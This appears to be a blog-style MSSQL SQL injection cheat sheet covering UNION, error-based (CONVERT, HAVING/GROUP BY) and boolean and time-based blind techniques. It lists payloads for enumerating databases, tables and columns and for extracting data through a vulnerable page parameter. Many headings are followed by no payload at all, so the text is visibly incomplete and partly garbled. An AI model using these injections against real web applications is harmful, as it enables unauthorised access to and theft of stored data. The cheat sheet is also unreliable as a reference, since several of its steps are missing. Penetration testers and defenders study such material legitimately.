MSSQL Practical Injection Cheat Sheet

Following on from my MySQL Injection Practical Cheat Sheet here is the MSSQL version.
As before, I will list the injections by their categories: union based, error based and inferential (time and boolean). Wherever you see @@version below (used to find the database version), you can replace it with:
db_name() – to extract database name
user_name() or user()- to extract the username the database runs under
@@servername – to extract the server name
host_name() – to extract the host name
Note that, in the below examples I am injecting into an integer field; for example, products.asp?id=1 <injection here>. As it’s an integer field I don’t need to use a single quote to close off the previous injection (this is usually the case for integer fields); however, if you’re injecting into a string field, be sure to use the quote!
UNION
UNION is used to append our malicious query onto the end of a valid query issued by the web application. Remember to find the number of columns first using ORDER BY or UNION with NULL values. Assuming there’s three columns:
Extract database version:
Extract database names (change N to a number starting from 1):
Extract table names:
Extract column names (replace table1):
1 UNION SELECT NULL,column_name,NULL FROM information_schema.COLUMNS-- will extract all columns (regardless of table) |
Extract data (change column1 and table1):
Extract table names from another database (replace other_database with database name)
Extract column names from another database (replace other_database and other_table):
Extract data from another database (replace other_database, other_table and other_column):
Error Based
CONVERT
This technique is very similar to the MySQL double query error based injection (discussed in my previouspost) in that an error is forced; however, a valid MSSQL query is included which gets executed first, leading to the results of the query being displayed in the error message. In the below examples, be sure to encode + with %2b if inputting directly into the address bar. There are two ways of performing this attack, with the first listed below being the quickest.
Method 1 – Quicker
Extract database version:
1 AND 1=CONVERT(INT,@@version)-- |
Extract number of databases:
Extract database names (replace N with a number starting from 1):
Extract table count:
Extract table names (replace N with a number starting from 1):
To extract column names (replace table1 with appropriate table name):
To extract data, first count the entries in the table (replace table1 with appropriate table name):
Then, assuming the columns we wish to extract from are called column1 and column2:
The second top 1 should be incremented to extract subsequent rows:
Extract tables from another database (change other_database and increase N):
Extract columns from another database (change other_database, other_table and increase N):
See how many data entries there are in another database (change other_database and other_table):
Extract data from another database (change other_database, other_table, other_column and increase N):
Method 2 – Slower
Extract database names (replace N with a number starting from 1):
1 AND 1=CONVERT(INT,db_name(N))-- |
Extract first table name:
As this had extracted the first table’s name (table1 in the example below), we add that to the query to enumerate the next table, like so:
Further tables can then be enumerated by adding table names to the query. The following query would extract the third table name:
Columns are then enumerated in the same manner as before (replace table1):
1 AND 1=CONVERT(INT,(SELECT top 1 column_name FROM information_schema.COLUMNS WHERE TABLE_NAME='table1'))-- |
Extract data (replace column1 and table1):
1 AND 1=CONVERT(INT,(SELECT top 1 column1 FROM table1))-- |
HAVING and GROUP BY
Some basic enumeration of the current database can be performed by forcing errors through the use ofHAVING and GROUP BY.
Will reveal the current table and the first column name in a table_name.column_name format.
The second column name can be enumerated with:
The second column name can then be added to the query to reveal the third column name:
If the page no longer errors when adding columns, there are none left to enumerate.
Inferential
When no data or error messages are returned, inferential injections (aka blind injections) can be used to ‘infer’ database information by using time based or boolean responses. This is done by using the SUBSTRING function to break up query results into individual characters which can be enumerated separately. The characters are entered using the ASCII function via their decimal codes, which can be ascertained by using this ASCII chart. The LOWER function is also used to ensure we only have to deal with lower case characters (up until the point of actual data retrieval).
In the case of time delay injections, thus, we are effectively asking the database: “if the first character of the database user’s name is S, wait 10 seconds before returning the page”. If the first character is not S, the page will return immediately. In the case of boolean injections, the expected page will return if the query evaluates to true and a differing page will return if the query evaluates to false.
When making inferential injections, it’s often useful to determine how many characters are in the piece of data you’re trying to extract. In MSSQL, this can be achieved by wrapping the injection in LEN .
Boolean
Extract version length:
Extract first character of version:
By increasing the SUBSTRING start argument, you can extract the second character in the version, like so:
Extract databases (replace N):
Extract 1st table:
Extract 2nd table (replace table1 with the first table’s name):
Extract 3rd table (replace table2 with the second table’s name):
Extract 1st column (replace table1):
Extract 2nd column (replace table1 and column1):
Extract 1st field of column1 (replace column1 and table1):
Extract 1st field of column2 (replace column1 and table1):
Extract 2nd field of column1 (replace column1,table1 and field1):
1 AND ASCII(SUBSTRING((SELECT TOP 1 column1 FROM table1 WHERE column1 >'field1'),1,1))>65-- |
Extract table 1 from another database (replace other_database)
Extract 1st column from another database (replace other_database and other_table):
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 column_name FROM other_database.information_schema.COLUMNS WHERE TABLE_NAME='other_table'),1,1)))>97-- |
Extract data from another database (replace other_database, other_table and other_column):
Time
Time based MSSQL injections use the WAITFOR function to produce an attacker specified delay in page loading if the query given evaluates to true.
Extract version:
1; IF LEN(@@version)>5 WAITFOR DELAY '00:00:15'-- |
Extract DB Name (replace N):
Extract 1st table:
Extract 2nd table (replace table1):
1; IF ASCII(LOWER(SUBSTRING((SELECT TOP 1 NAME FROM sysobjects WHERE xtype='U' AND name>'table1'),1,1)))>97 WAITFOR DELAY '00:00:15'-- |
Extract 3rd table (replace table2):
1; IF ASCII(LOWER(SUBSTRING((SELECT TOP 1 NAME FROM sysobjects WHERE xtype='U' AND name>'table2'),1,1)))>97 WAITFOR DELAY '00:00:15'-- |
To extract 1st column (replace table1):
To extract 2nd column (replace table1 and column1):
Extract 1st field of column 1 (replace table1 and column1):
Extract 1st field of column 2 (replace table1 and column1):
Extract 2nd field of column 1 (replace column1,table1 and field1):
1; IF ASCII(SUBSTRING((SELECT TOP 1 column1 FROM table1 WHERE column1 >'field1'),1,1))>65 WAITFOR DELAY '00:00:15'-- |
Extract 1st table from another database (replace other_database):
Extract 1st column from another database (replace other_database and other_table):
Extract 1st field of column 1 from another database (replace other_database, other_table and other_column):
Sources Used
The above information was took from a variety of sources, including:
Kaotic Creation’s article on blind SQL injections
Kaotic Creation’s article on CONVERT error based injections
Pentest Monkey’s MSSQL injection cheat sheet
CWH Underground’s ‘Full MSSQL Injection PWNage’ paper
Some other resources I recommend are:
Acuforum – an online vulnerable web app hosted by Acunetix
SQLZoo – a great online test bed